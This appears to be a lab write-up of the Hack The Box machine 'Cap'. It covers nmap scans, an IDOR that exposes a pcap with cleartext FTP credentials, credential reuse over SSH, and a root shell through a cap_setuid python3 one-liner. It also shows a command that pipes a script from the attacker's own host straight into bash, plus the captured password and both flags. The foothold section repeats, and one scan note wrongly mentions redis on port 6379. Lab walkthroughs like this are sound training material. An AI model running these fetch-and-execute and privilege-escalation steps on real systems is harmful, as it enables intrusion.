CAP

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sS -T4 10.129.161.225 -p- -oA 10.129.161.225.portsQuick
 PORT     STATE SERVICE       VERSION
 21/tcp   open  ftp
 22/tcp   open  ssh
 80/tcp   open  http
 
root@htb:~$ sudo nmap -sV -sC -T4 10.129.161.225 -p 21,22,80
 PORT     STATE SERVICE       VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
 |   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
 |_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
 80/tcp open  http    gunicorn
 |_http-server-header: gunicorn
 |_http-title: Security Dashboard
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 404 NOT FOUND
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:59 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Content-Length: 232
 |     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
 |     <title>404 Not Found</title>
 |     <h1>Not Found</h1>
 |     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
 |   GetRequest: 
 |     HTTP/1.0 200 OK
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:52 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Content-Length: 19386
 |     <!DOCTYPE html>
 |     <html class="no-js" lang="en">
 |     <head>
 |     <meta charset="utf-8">
 |     <meta http-equiv="x-ua-compatible" content="ie=edge">
 |     <title>Security Dashboard</title>
 |     <meta name="viewport" content="width=device-width, initial-scale=1">
 |     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
 |     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
 |     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
 |     <link rel="stylesheet" href="/static/css/themify-icons.css">
 |     <link rel="stylesheet" href="/static/css/metisMenu.css">
 |     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
 |     <link rel="stylesheet" href="/static/css/slicknav.min.css">
 |     <!-- amchar
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Server: gunicorn
 |     Date: Sun, 27 Jul 2025 23:29:52 GMT
 |     Connection: close
 |     Content-Type: text/html; charset=utf-8
 |     Allow: GET, HEAD, OPTIONS
 |     Content-Length: 0
 |   RTSPRequest: 
 |     HTTP/1.1 400 Bad Request
 |     Connection: close
 |     Content-Type: text/html
 |     Content-Length: 196
 |     <html>
 |     <head>
 |     <title>Bad Request</title>
 |     </head>
 |     <body>
 |     <h1><p>Bad Request</p></h1>
 |     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
 |     </body>
 |_    </html>

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln 10.129.161.225 -p 21,22,80
 PORT   STATE SERVICE
 21/tcp open  ftp
 22/tcp open  ssh
 80/tcp open  http
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.161.225
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.161.225:80/
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/netstat
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/ip
 |     Form id: 
 |     Form action: #
 |     
 |     Path: http://10.129.161.225:80/data/1
 |     Form id: 
 |_    Form action: #
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 |_      http://ha.ckers.org/slowloris/


 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit the flag located in the nathan user's home directory.
//test anonymous login
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): anonymous
 331 Please specify the password.
 Password: 
 530 Login incorrect.
 ftp: Login failed
 ftp> exit
 221 Goodbye.
//walk the application
root@htb:~$ BROWSER > 10.129.161.225

 * identified the following
    - downloadable pcap files
       - pcap files may contain sensitive captured credentials
          - URL may be vulnerable to IDOR
             - http://10.129.161.225/data/3
    - ip configuration
    - network status
#download and analyze pcaps
root@htb:~$ BROWSER > 10.129.161.225/data/3
root@htb:~$ wireshark &
 File > Open > 2.pcap
 
 * nothing pertinent found
    - pcap 1 through 2 didn't have any data
 
root@htb:~$ BROWSER > 10.129.161.225/data/0

 * was able to access pcap 0 with significant data

root@htb:~$ wireshark &
 File > Open > 0.pcap
  34	2.626895	192.168.196.16	192.168.196.1	FTP	76	Response: 220 (vsFTPd 3.0.3)
  36	4.126500	192.168.196.1	192.168.196.16	FTP	69	Request: USER nathan
  38	4.126630	192.168.196.16	192.168.196.1	FTP	90	Response: 331 Please specify the password.
  40	5.424998	192.168.196.1	192.168.196.16	FTP	78	Request: PASS Buck3tH4TF0RM3!
  42	5.432387	192.168.196.16	192.168.196.1	FTP	79	Response: 230 Login successful.
  
//use the obtain credential to login to the FTP server
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): nathan
 331 Please specify the password.
 Password: 
 230 Login successful.
ftp> ls
 -r--------    1 1001     1001           33 Jul 27 23:12 user.txt
 226 Directory send OK.
ftp> more user.txt
 e65efcf0cda311aebd9a44e5d2d02138

Submit the flag located in root's home directory.
//test anonymous login
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): anonymous
 331 Please specify the password.
 Password: 
 530 Login incorrect.
 ftp: Login failed
 ftp> exit
 221 Goodbye.
//walk the application
root@htb:~$ BROWSER > 10.129.161.225

 * identified the following
    - downloadable pcap files
       - pcap files may contain sensitive captured credentials
          - URL may be vulnerable to IDOR
             - http://10.129.161.225/data/3
    - ip configuration
    - network status
#download and analyze pcaps
root@htb:~$ BROWSER > 10.129.161.225/data/3
root@htb:~$ wireshark &
 File > Open > 2.pcap
 
 * nothing pertinent found
    - pcap 1 through 2 didn't have any data
 
root@htb:~$ BROWSER > 10.129.161.225/data/0

 * was able to access pcap 0 with significant data

root@htb:~$ wireshark &
 File > Open > 0.pcap
  34	2.626895	192.168.196.16	192.168.196.1	FTP	76	Response: 220 (vsFTPd 3.0.3)
  36	4.126500	192.168.196.1	192.168.196.16	FTP	69	Request: USER nathan
  38	4.126630	192.168.196.16	192.168.196.1	FTP	90	Response: 331 Please specify the password.
  40	5.424998	192.168.196.1	192.168.196.16	FTP	78	Request: PASS Buck3tH4TF0RM3!
  42	5.432387	192.168.196.16	192.168.196.1	FTP	79	Response: 230 Login successful.
  
//use the obtain credential to login to the FTP server
root@htb:~$ ftp 10.129.161.225
 Connected to 10.129.161.225.
 220 (vsFTPd 3.0.3)
 Name (10.129.161.225:root): nathan
 331 Please specify the password.
 Password: 
 230 Login successful.
ftp> ls
 -r--------    1 1001     1001           33 Jul 27 23:12 user.txt
 226 Directory send OK.
ftp> more user.txt
 e65efcf0cda311aebd9a44e5d2d02138
//test credentials against SSH
root@htb:~$ ssh [email protected]
 nathan:Buck3tH4TF0RM3!
 
nathan@cap:~$ sudo -l
 [sudo] password for nathan: 
 Sorry, user nathan may not run sudo on cap.

//escalate privileges
root@htb:~$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/linpeas.sh
root@htb:~$ python3 -m http.server 8080
 ...
nathan@cap:~$ curl 10.10.14.4:8080/linpeas.sh | bash

 * the piped bash cmd immediately executes the downloaded linpeas.sh file on
   the target


 ╔══════════╣ Capabilities
 ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
 ══╣ Current shell capabilities
 ...
 Files with capabilities (limited to 50):
 /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

root@htb:~$ BROWSER > https://chatgpt.com/
  ╔══════════╣ Capabilities
  ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
  ══╣ Current shell capabilities
  ...
  Files with capabilities (limited to 50):
  /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
  /usr/bin/ping = cap_net_raw+ep
  /usr/bin/traceroute6.iputils = cap_net_raw+ep
  /usr/bin/mtr-packet = cap_net_raw+ep
  /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
  
 * Linux capabilities break up root privileges into distinct 
   units (like cap_net_raw, cap_setuid, etc.), allowing non-root binaries to 
   perform specific privileged operations without full root access
    - privilege escalation is possible if a binary like python3 or perl with 
      dangerous capabilities like cap_setuid
   
nathan@cap:~$ which python3
 /usr/bin/python3
 
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
 uid=0(root) gid=1001(nathan) groups=1001(nathan)
# ls
 snap  user.txt
 
# ls /root
 root.txt  snap

# cat /root/root.txt
 09a7a10dc34ee7ca08fca767a8e8577a
PreviousINTRO TO RED TEAMNextTHM

Last updated